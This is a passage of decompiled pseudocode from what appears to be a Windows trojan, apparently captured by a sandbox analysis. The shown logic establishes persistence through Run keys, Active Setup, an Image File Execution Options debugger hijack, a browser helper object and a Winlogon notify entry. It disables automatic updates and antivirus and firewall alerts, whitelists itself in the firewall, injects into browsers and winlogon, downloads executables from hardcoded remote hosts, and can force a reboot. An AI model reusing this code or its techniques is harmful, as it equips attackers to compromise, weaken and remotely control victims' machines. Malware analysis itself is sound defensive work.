				CHAR* _t697;
				int _t698;
				CHAR* _t699;
				CHAR* _t700;
				void* _t701;
				signed int* _t703;
				char* _t704;
				void* _t705;
				CHAR* _t706;
				CHAR* _t707;
				void* _t708;
				signed int* _t710;
				char* _t711;
				signed char _t712;
				int* _t716;
				int* _t717;
				int _t718;
				int _t720;
				int _t721;
				void* _t722;
				signed int* _t746;
				signed char* _t747;
				signed char* _t748;
				signed int* _t750;
				signed int* _t753;
				char* _t755;
				signed char* _t756;
				void* _t757;
				void* _t758;
				signed int* _t759;
				void** _t760;
				int _t762;
				void** _t763;
				void** _t764;
				char* _t765;
				CHAR* _t766;
				signed char* _t767;
				int* _t768;
				signed int* _t769;
				void* _t770;
				void* _t771;
				char* _t772;
				signed int* _t773;
				void* _t774;
				char* _t775;
				signed int* _t776;
				long _t777;
				struct _FILETIME* _t778;
				void* _t779;
				int* _t780;

				_t328 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe", _t779 + 0x98); // executed
				if(_t328 != 0) {
					L24:
					 *(_t779 + 0x78) = 0x10;
					_t674 = _t779 + 0x1ec;
					_t330 = GetComputerNameA(_t674, _t779 + 0x78); // executed
					__eflags = _t330;
					if(_t330 == 0) {
						L26:
						_push("QlC5hT0yHn63XEm5LqJ2OxSkGj2v");
						_push(_t779 + 0x1bc);
						L00405E20();
						L30:
						wsprintfA("{38383738-3439-3838-3738-343938383738}", "{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}",  *((char*)(_t779 + 0x1f4)),  *((char*)(_t779 + 0x1f1)),  *((char*)(_t779 + 0x1ee)),  *((char*)(_t779 + 0x1eb)),  *((char*)(_t779 + 0x1e8)),  *((char*)(_t779 + 0x1e5)),  *((char*)(_t779 + 0x1e2)),  *((char*)(_t779 + 0x1df)),  *((char*)(_t779 + 0x1dc)),  *((char*)(_t779 + 0x1d9)),  *((char*)(_t779 + 0x1d6)),  *((char*)(_t779 + 0x1d3)),  *((char*)(_t779 + 0x1d0)),  *((char*)(_t779 + 0x1cd)),  *((char*)(_t779 + 0x1ca)),  *((char*)(_t779 + 0x1c7)));
						_t780 = _t779 + 0x48;
						_t349 = "SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\";
						while(1) {
							__eflags = _t349 - 0x407ad5;
							if(_t349 >= 0x407ad5) {
								break;
							}
							 *_t349 =  *_t349 ^ 0x000000d4;
							_t349 =  &(_t349[1]);
						}
						while(1) {
							__eflags = 0x4072a0 - "SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\";
							if(0x4072a0 >= "SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\") {
								break;
							}
							 *0x4072a0 =  *0x4072a0 ^ 0x0000004d;
							__eflags =  *0x4072a0;
							 *(_t777 + 0x40) =  *(_t777 + 0x40) ^ _t712;
						}
						_push("{38383738-3439-3838-3738-343938383738}");
						_push("SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\");
						_t675 =  &(_t780[0x410]);
						_push(_t675);
						L00405E20();
						_push(0x4072a0);
						L00405E30();
						_t352 = RegCreateKeyA(0x80000002, _t675,  &(_t780[0x26])); // executed
						__eflags = _t352;
						if(_t352 != 0) {
							L61:
							_t354 = E004030DE( &(_t780[0x1ee]));
							_t780[0x26] = _t354;
							__eflags = _t354;
							if(_t354 == 0) {
								L81:
								_t355 = E004010B2();
								__eflags = _t355;
								_t720 = _t355;
								if(_t355 == 0) {
									_t720 = 0x42;
								}
								_t780[0x1ee] = _t720;
								_t356 = E004010B2();
								__eflags = _t356;
								_t721 = _t356;
								if(_t356 == 0) {
									_t721 = 0x4d;
								}
								_t780[0x162] = _t721;
								_push( *0x4120b0);
								_push( &(_t780[0x163]));
								L00405E20();
								_push( &(_t780[0x55a]));
								_push( &(_t780[0x1ac]));
								L00405E20();
								_t759 = _t780[5];
								_t360 = _t759 + _t777;
								while(1) {
									__eflags = _t759 - _t360;
									if(_t759 >= _t360) {
										break;
									}
									 *_t759 =  *_t759 ^ _t780[0x162] & 0x000000ff;
									_t759 =  &(_t759[0]);
									_t360 = _t780[5] + _t777;
								}
								_t676 =  &(_t780[0x517]);
								_t361 = ExpandEnvironmentStringsA("%AppData%\\", _t676, 0x104);
								__eflags = _t361;
								if(_t361 == 0) {
									L92:
									_t677 =  &(_t780[0x516]);
									_t362 = GetTempPathA(0x104, _t677);
									__eflags = _t362;
									if(_t362 == 0) {
										L100:
										E00401029(_t780[5]);
										_t678 =  &(_t780[0x387]);
										_t365 = GetSystemDirectoryA(_t678, 0x104);
										_push(0x80);
										_push( *0x4120c0);
										_push(0x41103e);
										_push(_t678);
										L00405E30();
										L00405E30();
										SetFileAttributesA(_t365, _t365); // executed
										_t367 = CreateFileA(_t678, 0x40000000, 0, 0, 2, 0x80, 0); // executed
										_t780[0x28] = _t367;
										__eflags = _t367;
										if(_t367 == 0) {
											L107:
											_t368 = GetLastError();
											__eflags = _t368 - 0x20;
											if(_t368 != 0x20) {
												_t679 =  &(_t780[0x387]);
												_t369 = ExpandEnvironmentStringsA("%AppData%\\", _t679, 0x104);
												_push(0x80);
												_push( *0x4120c0);
												L00405E30();
												SetFileAttributesA(_t369, _t679);
												_t371 = CreateFileA(_t679, 0x40000000, 0, 0, 2, 0x80, 0);
												_t780[0x28] = _t371;
												__eflags = _t371;
												if(_t371 == 0) {
													L111:
													_t372 = GetLastError();
													__eflags = _t372 - 0x20;
													if(_t372 == 0x20) {
														goto L108;
													}
													_t543 = GetTempPathA(0x104, _t679);
													_push(0x80);
													_push( *0x4120c0);
													L00405E30();
													SetFileAttributesA(_t543, _t679);
													_t545 = CreateFileA(_t679, 0x40000000, 0, 0, 2, 0x80, 0);
													_t780[0x28] = _t545;
													__eflags = _t545;
													if(_t545 == 0) {
														L114:
														_t546 = GetLastError();
														__eflags = _t546 - 0x20;
														if(_t546 == 0x20) {
															goto L108;
														}
														L117:
														_t680 =  &(_t780[0x343]);
														_t377 = ExpandEnvironmentStringsA("%AppData%\\", _t680, 0x104);
														_push(0x80);
														_push( *0x4120d0);
														L00405E30();
														SetFileAttributesA(_t377, _t680); // executed
														_t379 = CreateFileA(_t680, 0x40000000, 0, 0, 2, 0x80, 0); // executed
														_t780[0x28] = _t379;
														__eflags = _t379;
														_t722 = _t379;
														if(_t379 == 0) {
															L119:
															_t681 =  &(_t780[0x342]);
															_t380 = GetTempPathA(0x104, _t681);
															_push(0x80);
															_push( *0x4120d0);
															L00405E30();
															SetFileAttributesA(_t380, _t681);
															_t382 = CreateFileA(_t681, 0x40000000, 0, 0, 2, 0x80, 0);
															_t780[0x28] = _t382;
															__eflags = _t382;
															_t722 = _t382;
															if(_t382 == 0) {
																L122:
																_t780[0x342] = 0;
																L123:
																__eflags = _t780[0x342];
																if(_t780[0x342] != 0) {
																	CreateFileA( &(_t780[0x348]), 0x80000000, 1, 0, 3, 0, 0); // executed
																}
																_t682 =  &(_t780[0x2b]);
																GetSystemDirectoryA(_t682, 0x104);
																_push(0x41103e);
																_push(_t682);
																L00405E30();
																E004012C2(_t682);
																ExpandEnvironmentStringsA("%CommonProgramFiles%\\System\\", _t682, 0x104);
																E004012C2(_t682);
																ExpandEnvironmentStringsA("%AppData%\\", _t682, 0x104);
																E004012C2(_t682);
																_t392 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
																while(1) {
																	__eflags = _t392 - 0x40724d;
																	if(_t392 >= 0x40724d) {
																		break;
																	}
																	 *_t392 =  *_t392 ^ 0x000000d4;
																	_t392 =  &(_t392[1]);
																}
																_t393 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006,  &(_t780[0x26])); // executed
																__eflags = _t393;
																if(_t393 == 0) {
																	L130:
																	__eflags = _t780[0xb];
																	if(_t780[0xb] == 0) {
																		_t695 =  &(_t780[0x55a]);
																		_t533 = E00401251(_t780[0x26]);
																		_push(_t695);
																		L00405E40();
																		_t534 = _t533 + 1;
																		__eflags = _t534;
																		RegSetValueExA(_t780[0x2b],  *0x4120b0, 0, 1, _t695, _t534);
																	}
																	RegDeleteValueA(_t780[0x27], "winrnt.exe"); // executed
																	RegCloseKey(_t780[0x26]); // executed
																	L133:
																	__eflags =  *0x412100 - 2;
																	if( *0x412100 != 2) {
																		L173:
																		_t396 = CreateThread(0, 0x10000, E0040265F, 2, 0,  &(_t780[0x27])); // executed
																		CloseHandle(_t396);
																		_t398 = "sOfTwaRe\\mIcRoSofT\\cOdE SToRe dAtAbAsE\\Distribution Units\\{BA168755-D1D0-B2E2-F2AB-FE41DD2CB2AB}";
																		while(1) {
																			__eflags = _t398 - 0x407060;
																			if(_t398 >= 0x407060) {
																				break;
																			}
																			 *_t398 =  *_t398 ^ 0x000000d4;
																			_t398 =  &(_t398[1]);
																		}
																		_t780[0xc] = 0;
																		while(1) {
																			E004011CF(0x80000002, "sOfTwaRe\\mIcRoSofT\\cOdE SToRe dAtAbAsE\\Distribution Units\\{BA168755-D1D0-B2E2-F2AB-FE41DD2CB2AB}");
																			__eflags = _t780[0xc] - 9;
																			if(_t780[0xc] <= 9) {
																				goto L212;
																			}
																			_t780[0x16] = 0;
																			_t780[0x17] = 0;
																			_t457 = E004025C3();
																			__eflags = _t457;
																			if(_t457 != 0) {
																				L209:
																				 *_t780 = 0;
																				L213:
																				_t780[0xd] = 0x3b;
																				do {
																					__eflags = _t780[0x342];
																					if(_t780[0x342] != 0) {
																						_push(0);
																						_push("opera.exe");
																						_push("seamonkey.exe");
																						_push("mozilla.exe");
																						_push("firefox.exe");
																						_push("iexplore.exe");
																						_push("explorer.exe");
																						E0040318D( &(_t780[0x349]));
																						_t780 =  &(_t780[8]);
																					}
																					__eflags = _t780[0xa];
																					if(_t780[0xa] != 0) {
																						_t686 =  &(_t780[0x3cb]);
																						SetFileAttributesA(_t686, 0x21); // executed
																						_t434 = RegCreateKeyA(0x80000002,  &(_t780[0x40f]),  &(_t780[0x26])); // executed
																						__eflags = _t434;
																						if(_t434 == 0) {
																							E00401251(_t780[0x26]);
																							_t780[0x27] = 1;
																							_t438 = RegSetValueExA(_t780[0x2b], "IsInstalled", 0, 4,  &(_t780[0x28]), 4); // executed
																							_push(_t686);
																							L00405E40();
																							_t439 = _t438 + 1;
																							__eflags = _t439;
																							RegSetValueExA(_t780[0x2b], "StubPath", 0, 1, _t686, _t439); // executed
																							RegCloseKey(_t780[0x26]); // executed
																						}
																					}
																					__eflags = _t780[0xb];
																					_t760 =  &(_t780[0x26]);
																					if(_t780[0xb] == 0) {
																						_t401 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006, _t760);
																						__eflags = _t401;
																						if(_t401 == 0) {
																							L224:
																							_t683 =  &(_t780[0x55a]);
																							_push(_t683);
																							L00405E40();
																							_t402 = _t401 + 1;
																							__eflags = _t402;
																							_push(_t402);
																							_push(_t683);
																							_push(1);
																							_push(0);
																							_push( *0x4120b0);
																							goto L225;
																						}
																						_t401 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006, _t760);
																						__eflags = _t401;
																						if(_t401 != 0) {
																							goto L226;
																						}
																						goto L224;
																					} else {
																						_t687 =  &(_t780[0x48f]);
																						SetFileAttributesA(_t687, 0x21); // executed
																						_t408 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe", _t760); // executed
																						__eflags = _t408;
																						if(_t408 != 0) {
																							L226:
																							__eflags = _t780[9];
																							if(_t780[9] == 0) {
																								goto L236;
																							}
																							_t684 =  &(_t780[0x27]);
																							_t409 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t684, 0); // executed
																							__eflags = _t409;
																							if(_t409 == 0) {
																								L229:
																								RegSetValueExA(_t780[0x2b], "SubshellState", 0, 3,  &(_t780[0x1ef]), 0x22a); // executed
																								RegCloseKey(_t780[0x26]); // executed
																								L230:
																								_t685 =  &(_t780[0x387]);
																								SetFileAttributesA(_t685, 0x21); // executed
																								__eflags =  *0x412100 - 2;
																								_t763 =  &(_t780[0x26]);
																								if( *0x412100 != 2) {
																									_t414 = RegCreateKeyA(0x80000000, "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32", _t763);
																									__eflags = _t414;
																									if(_t414 != 0) {
																										goto L236;
																									}
																									_push(_t685);
																									L00405E40();
																									RegSetValueExA(_t780[0x2b], 0, 0, 1, _t685, _t414 + 1);
																									RegSetValueExA(_t780[0x2b], "ThreadingModel", 0, 1, "Both", 5);
																									RegCloseKey(_t780[0x26]);
																									_t419 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}", _t763);
																									__eflags = _t419;
																									if(_t419 != 0) {
																										goto L236;
																									}
																									L235:
																									RegCloseKey(_t780[0x26]); // executed
																									goto L236;
																								}
																								_t421 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}", _t763); // executed
																								__eflags = _t421;
																								if(_t421 != 0) {
																									goto L236;
																								}
																								_t423 = E00401251(_t780[0x26]);
																								_push(_t685);
																								L00405E40();
																								RegSetValueExA(_t780[0x2b], "DLLName", 0, 1, _t685, _t423 + 1); // executed
																								RegSetValueExA(_t780[0x2b], "Startup", 0, 1, "Startup", 8); // executed
																								goto L235;
																							}
																							_t427 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t684, 0);
																							__eflags = _t427;
																							if(_t427 != 0) {
																								goto L230;
																							}
																							goto L229;
																						}
																						_t429 = E00401251(_t780[0x26]);
																						_push(_t687);
																						L00405E40();
																						_push(_t429 + 1);
																						_push(_t687);
																						_push(1);
																						_push(0);
																						_push("Debugger");
																						L225:
																						RegSetValueExA(_t780[0x2b], ??, ??, ??, ??, ??); // executed
																						RegCloseKey(_t780[0x26]); // executed
																						goto L226;
																					}
																					L236:
																					SetFileAttributesA( &(_t780[0x55b]), 0x21); // executed
																					Sleep(0x3e8); // executed
																					_t314 =  &(_t780[0xd]);
																					 *_t314 = _t780[0xd] - 1;
																					__eflags =  *_t314;
																				} while ( *_t314 >= 0);
																				_t445 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0,  &(_t780[0x12]), 0);
																				__eflags = _t445;
																				if(_t445 == 0) {
																					_t780[0x10] = 4;
																					_t691 =  &(_t780[0x10]);
																					_t447 = RegQueryValueExA(_t780[0x16], "g00d d0gg", 0, 0, _t691,  &(_t780[0x10]));
																					__eflags = _t447;
																					if(_t447 == 0) {
																						_t450 = _t780[0xf] - 1;
																						__eflags = _t450;
																						_t780[0xf] = _t450;
																						if(_t450 == 0) {
																							RegDeleteValueA(_t780[0x12], "g00d d0gg");
																							Sleep(0x1388);
																							__eflags =  *0x412100 - 2;
																							if( *0x412100 != 2) {
																								ExitWindowsEx(6, 0);
																							} else {
																								RtlAdjustPrivilege(0x13, 1, 0,  &(_t780[0xe]));
																								 *0x412240(1);
																							}
																						} else {
																							RegSetValueExA(_t780[0x16], "g00d d0gg", 0, 4, _t691, 4);
																						}
																					}
																					RegCloseKey(_t780[0x11]);
																				}
																				continue;
																			}
																			_t459 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0x2001f, 0,  &(_t780[0x1c]), 0);
																			__eflags = _t459;
																			if(_t459 != 0) {
																				__eflags =  *_t780;
																				if( *_t780 == 0) {
																					goto L213;
																				}
																				L211:
																				_t780[0xc] = 0;
																				goto L213;
																			}
																			_t778 =  &(_t780[0x19]);
																			GetSystemTimeAsFileTime(_t778);
																			_t780[0x18] = 8;
																			_t755 =  &(_t780[0x17]);
																			_t461 = RegQueryValueExA(_t780[0x20], "ConnPred", 0,  &(_t780[0x17]), _t755,  &(_t780[0x18]));
																			__eflags = _t461;
																			if(_t461 != 0) {
																				L182:
																				__eflags = E004014D8(_t778, 0x412070) - 0x4af;
																				if(__eflags <= 0) {
																					L193:
																					__eflags =  *0x412080;
																					if( *0x412080 == 0) {
																						L196:
																						_t780[0x18] = 8;
																						__eflags = RegQueryValueExA(_t780[0x20], "UseExtProfile", 0,  &(_t780[0x17]), _t755,  &(_t780[0x18]));
																						if(__eflags != 0) {
																							L198:
																							_t466 = E00402427(__eflags);
																							__eflags = _t466;
																							if(_t466 != 0) {
																								L208:
																								RegCloseKey(_t780[0x1b]);
																								goto L209;
																							}
																							_push(1);
																							_push(0);
																							_t469 = E0040211B("http://69.50.173.166/gdnOT2424.exe", 0);
																							__eflags = _t469;
																							if(_t469 == 0) {
																								L201:
																								_t780[0x18] = 8;
																								_t689 =  &(_t780[0x13]);
																								_t471 = RegQueryValueExA(_t780[0x20], "UseDflProfile", 0,  &(_t780[0x17]),  &(_t780[0x13]),  &(_t780[0x18]));
																								__eflags = _t471;
																								if(_t471 != 0) {
																									_t480 = _t780[0x16] + 0x1162f100;
																									__eflags = _t480;
																									asm("adc edx, 0xffffff9b");
																									_t780[0x12] = _t480;
																									_t780[0x13] = _t780[0x17];
																								}
																								__eflags = E004014D8( &(_t780[0x19]), _t689) - 0x152ab;
																								if(__eflags <= 0) {
																									goto L208;
																								} else {
																									_t474 = E00402427(__eflags);
																									__eflags = _t474;
																									if(_t474 != 0) {
																										goto L208;
																									}
																									_push(3);
																									_push(0);
																									_t476 = E0040211B("tombul.gif", 0);
																									__eflags = _t476;
																									if(_t476 == 0) {
																										goto L208;
																									}
																									_push(8);
																									_push(_t778);
																									_push(0xb);
																									_push(0);
																									_push("UseDflProfile");
																									L207:
																									RegSetValueExA(_t780[0x20], ??, ??, ??, ??, ??);
																									RegCloseKey(_t780[0x1b]);
																									 *_t780 = 1;
																									goto L211;
																								}
																							}
																							_t780[0x16] = _t780[0x19].dwLowDateTime;
																							_t780[0x17] = _t780[0x1a];
																							_push(8);
																							_push(_t778);
																							_push(0xb);
																							_push(0);
																							_push("UseExtProfile");
																							goto L207;
																						}
																						__eflags = E004014D8( &(_t780[0x19]),  &(_t780[0x16])) - 0x152ab;
																						if(__eflags <= 0) {
																							goto L201;
																						}
																						goto L198;
																					}
																					_push(3);
																					_push(0);
																					_t485 = E0040211B("grazie.gif", 0);
																					__eflags = _t485;
																					if(_t485 == 0) {
																						goto L196;
																					}
																					_t780[0x16] = _t780[0x19].dwLowDateTime;
																					_t780[0x17] = _t780[0x1a];
																					_push(8);
																					_push(_t778);
																					_push(0xb);
																					_push(0);
																					_push("ConnPred");
																					goto L207;
																				}
																				_t487 = E00402427(__eflags);
																				__eflags = _t487;
																				if(_t487 != 0) {
																					goto L208;
																				}
																				_t489 = E004019E8("http://utbidet-ugeas.biz/d/cc", 0, 1);
																				_t762 = 0;
																				__eflags = _t489;
																				_t690 = _t489;
																				if(_t489 != 0) {
																					_t494 = E00401E00(_t489,  &(_t780[0x15]), 2);
																					__eflags = _t494 - 2;
																					if(_t494 == 2) {
																						_t762 = 1;
																					}
																				}
																				E00401F59(_t690);
																				__eflags = _t762;
																				if(_t762 == 0) {
																					 *0x412080 = 0;
																				} else {
																					 *0x412070 = _t780[0x19];
																					_t493 = 0;
																					__eflags = _t780[0x14] - 0x49;
																					 *0x412074 = _t780[0x1a];
																					if(_t780[0x14] == 0x49) {
																						__eflags = _t780[0x14] - 0x54;
																						if(_t780[0x14] == 0x54) {
																							_t493 = 1;
																						}
																					}
																					 *0x412080 = _t493;
																				}
																				goto L193;
																			}
																			_t496 = E004014D8(_t778, _t755);
																			__eflags = _t496 - 0x152ab;
																			if(_t496 <= 0x152ab) {
																				goto L196;
																			}
																			goto L182;
																			L212:
																			_t277 =  &(_t780[0xc]);
																			 *_t277 = _t780[0xc] + 1;
																			__eflags =  *_t277;
																			goto L213;
																		}
																	}
																	_t497 = "SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU";
																	while(1) {
																		__eflags = _t497 - 0x407214;
																		if(_t497 >= 0x407214) {
																			break;
																		}
																		 *_t497 =  *_t497 ^ 0x000000d4;
																		_t497 =  &(_t497[1]);
																	}
																	_t498 = "NoAutoUpdate";
																	while(1) {
																		__eflags = _t498 - 0x4071cf;
																		if(_t498 >= 0x4071cf) {
																			break;
																		}
																		 *_t498 =  *_t498 ^ 0x000000d4;
																		_t498 =  &(_t498[1]);
																	}
																	_t764 =  &(_t780[0x26]);
																	_t499 = RegCreateKeyA(0x80000002, "SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", _t764); // executed
																	__eflags = _t499;
																	if(_t499 == 0) {
																		RegSetValueExA(_t780[0x2b], "NoAutoUpdate", 0, 4,  &(_t780[0x28]), 4); // executed
																		RegCloseKey(_t780[0x26]);
																	}
																	_t500 = "SOFTWARE\\Microsoft\\Security Center";
																	while(1) {
																		__eflags = _t500 - 0x4071c2;
																		if(_t500 >= 0x4071c2) {
																			break;
																		}
																		 *_t500 =  *_t500 ^ 0x000000d4;
																		_t500 =  &(_t500[1]);
																	}
																	_t501 = "AntiVirusOverride";
																	while(1) {
																		__eflags = _t501 - 0x407188;
																		if(_t501 >= 0x407188) {
																			break;
																		}
																		 *_t501 =  *_t501 ^ 0x000000d4;
																		_t501 =  &(_t501[1]);
																	}
																	_t502 = "AntiVirusDisableNotify";
																	while(1) {
																		__eflags = _t502 - 0x407176;
																		if(_t502 >= 0x407176) {
																			break;
																		}
																		 *_t502 =  *_t502 ^ 0x000000d4;
																		_t502 =  &(_t502[1]);
																	}
																	_t503 = "FirewallDisableNotify";
																	while(1) {
																		__eflags = _t503 - 0x40715f;
																		if(_t503 >= 0x40715f) {
																			break;
																		}
																		 *_t503 =  *_t503 ^ 0x000000d4;
																		_t503 =  &(_t503[1]);
																	}
																	_t504 = "UpdatesDisableNotify";
																	while(1) {
																		__eflags = _t504 - 0x407149;
																		if(_t504 >= 0x407149) {
																			break;
																		}
																		 *_t504 =  *_t504 ^ 0x000000d4;
																		_t504 =  &(_t504[1]);
																	}
																	_t505 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center", 0, 0x20006, _t764); // executed
																	__eflags = _t505;
																	if(_t505 == 0) {
																		_t694 =  &(_t780[0x28]);
																		RegSetValueExA(_t780[0x2b], "AntiVirusOverride", 0, 4, _t694, 4); // executed
																		RegSetValueExA(_t780[0x2b], "AntiVirusDisableNotify", 0, 4, _t694, 4); // executed
																		RegSetValueExA(_t780[0x2b], "FirewallDisableNotify", 0, 4, _t694, 4); // executed
																		RegSetValueExA(_t780[0x2b], "UpdatesDisableNotify", 0, 4, _t694, 4); // executed
																		RegCloseKey(_t780[0x26]); // executed
																	}
																	_t506 = "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List";
																	while(1) {
																		__eflags = _t506 - 0x407134;
																		if(_t506 >= 0x407134) {
																			break;
																		}
																		 *_t506 =  *_t506 ^ 0x000000d4;
																		_t506 =  &(_t506[1]);
																	}
																	_t507 = RegOpenKeyExA(0x80000002, "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List", 0, 0x2001f, _t764); // executed
																	__eflags = _t507;
																	if(_t507 != 0) {
																		goto L173;
																	}
																	_t509 = E00401000(0x8000);
																	_t780[0x1d] = 0x4000;
																	_t765 = _t509;
																	_t510 = 0x407080;
																	_t780[0x27] = 0x4000;
																	while(1) {
																		__eflags = _t510 - 0x4070a4;
																		if(_t510 >= 0x4070a4) {
																			break;
																		}
																		 *_t510 =  *_t510 ^ 0x000000d4;
																		_t510 =  &(_t510[1]);
																	}
																	_t780[0xd] = 0;
																	while(1) {
																		_t224 =  &(_t765[0x4000]); // 0x4000
																		_t692 = _t224;
																		_t514 = RegEnumValueA(_t780[0x2d], _t780[0x13], _t765,  &(_t780[0x2b]), 0,  &(_t780[0x1e]), _t224,  &(_t780[0x1d]));
																		__eflags = _t514;
																		if(_t514 != 0) {
																			break;
																		}
																		__eflags = _t780[0x1c] - 1;
																		if(_t780[0x1c] == 1) {
																			_t516 = E00401311(_t692, 0x40708d);
																			__eflags = _t516;
																			if(_t516 != 0) {
																				RegDeleteValueA(_t780[0x27], _t765);
																			}
																		}
																		_t219 =  &(_t780[0xd]);
																		 *_t219 = _t780[0xd] + 1;
																		__eflags =  *_t219;
																		_t780[0x1d] = 0x4000;
																		_t780[0x27] = 0x4000;
																	}
																	_t693 =  &(_t780[0x55a]);
																	_t519 = wsprintfA(_t765, 0x407080, _t693) + 1;
																	__eflags = _t519;
																	_t780 =  &(_t780[3]);
																	RegSetValueExA(_t780[0x2b], _t693, 0, 1, _t765, _t519);
																	E00401029(_t765);
																	RegCloseKey(_t780[0x26]);
																	goto L173;
																}
																_t537 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006,  &(_t780[0x26]));
																__eflags = _t537;
																if(_t537 != 0) {
																	goto L133;
																}
																goto L130;
															}
															__eflags = _t382 - 0xffffffff;
															if(_t382 == 0xffffffff) {
																goto L122;
															}
															L121:
															WriteFile(_t722, 0x408840, 0x5e00,  &(_t780[0x28]), 0); // executed
															CloseHandle(_t780[0x28]); // executed
															goto L123;
														}
														__eflags = _t379 - 0xffffffff;
														if(_t379 != 0xffffffff) {
															goto L121;
														}
														goto L119;
													}
													__eflags = _t545 + 1;
													if(_t545 + 1 != 0) {
														L102:
														WriteFile(_t780[0x2c], 0x40e640, 0x1400,  &(_t780[0x28]), 0); // executed
														__eflags = _t780[3];
														if(_t780[3] != 0) {
															SetFileTime(_t780[0x2b],  &(_t780[0x21]),  &(_t780[0x22]),  &(_t780[0x23])); // executed
														}
														CloseHandle(_t780[0x28]); // executed
														_t780[9] = 1;
														_push(0);
														_push("winlogon.exe");
														_t696 =  &(_t780[0x388]);
														_t551 = E0040318D(_t696);
														_t780 =  &(_t780[3]);
														__eflags = _t551;
														if(_t551 == 0) {
															_push(0);
															_push("explorer.exe");
															E0040318D(_t696);
															_t780 =  &(_t780[3]);
														}
														_push(0);
														_push("kernel32.dll");
														_push(_t696);
														L116:
														E0040318D();
														_t780 =  &(_t780[3]);
														CreateFileA( &(_t780[0x38c]), 0x80000000, 1, 0, 3, 0, 0); // executed
														goto L117;
													}
													goto L114;
												}
												__eflags = _t371 + 1;
												if(_t371 + 1 != 0) {
													goto L102;
												}
												goto L111;
											}
											L108:
											_t780[9] = 1;
											_push(0);
											_push("kernel32.dll");
											_push( &(_t780[0x388]));
											goto L116;
										}
										__eflags = _t367 + 1;
										if(_t367 + 1 == 0) {
											goto L107;
										}
										goto L102;
									} else {
										_t766 =  &(_t780[0x16a]);
										_t559 = GetTempFileNameA(_t677, "tmp", 0, _t766);
										__eflags = _t559;
										if(_t559 == 0) {
											goto L100;
										}
										_t560 = CreateFileA(_t766, 0x40000000, 0, 0, 2, 0x80, 0);
										_t780[0x28] = _t560;
										__eflags = _t560;
										if(_t560 == 0) {
											goto L100;
										}
										__eflags = _t560 + 1;
										if(_t560 + 1 == 0) {
											goto L100;
										}
										L97:
										WriteFile(_t780[0x2c], _t780[8], _t777,  &(_t780[0x28]), 0); // executed
										CloseHandle(_t780[0x28]);
										CreateFileA( &(_t780[0x170]), 0x80000000, 1, 0, 3, 0, 0); // executed
										_t767 =  &(_t780[0x1ee]);
										_t746 =  &(_t780[0x162]);
										_t716 =  &(_t780[0x278]);
										while(1) {
											__eflags = _t767 - _t716;
											if(_t767 >= _t716) {
												goto L100;
											}
											_t568 = _t780[0x1ee] & 0x000000ff ^  *_t746;
											_t746 =  &(_t746[0]);
											 *_t767 = _t568;
											_t767 =  &(_t767[1]);
										}
										goto L100;
									}
								}
								_t768 =  &(_t780[0x16a]);
								_push(_t768);
								_push(0);
								_push(0x411040);
								_push(_t676);
								L00405E90();
								__eflags = _t361;
								if(_t361 == 0) {
									goto L92;
								}
								_push(0);
								_push(0x80);
								_push(2);
								_push(0);
								_push(0);
								_push(0x40000000);
								_push(_t768);
								L00405DB0();
								_t780[0x28] = _t361;
								__eflags = _t361;
								if(_t361 == 0) {
									goto L92;
								}
								__eflags = _t361 + 1;
								if(_t361 + 1 != 0) {
									goto L97;
								}
								goto L92;
							}
							RegDeleteValueA(_t354, "SubshellState");
							RegCloseKey(_t780[0x26]);
							_t769 =  &(_t780[0x1ee]);
							_t747 =  &(_t780[0x162]);
							_t717 =  &(_t780[0x278]);
							while(1) {
								__eflags = _t769 - _t717;
								if(_t769 >= _t717) {
									break;
								}
								_t595 = _t780[0x1ee] & 0x000000ff ^  *_t769;
								_t769 =  &(_t769[0]);
								 *_t747 = _t595;
								_t747 =  &(_t747[1]);
							}
							_push( *0x4120b0);
							_t574 =  &(_t780[0x163]);
							_push(_t574);
							L00405E50();
							__eflags = _t574;
							if(_t574 != 0) {
								L67:
								_t697 =  &(_t780[0x16b]);
								SetFileAttributesA(_t697, 0x80);
								DeleteFileA(_t697);
								goto L81;
							}
							_push( &(_t780[0x55a]));
							_t578 =  &(_t780[0x1ac]);
							_push(_t578);
							L00405E50();
							__eflags = _t578;
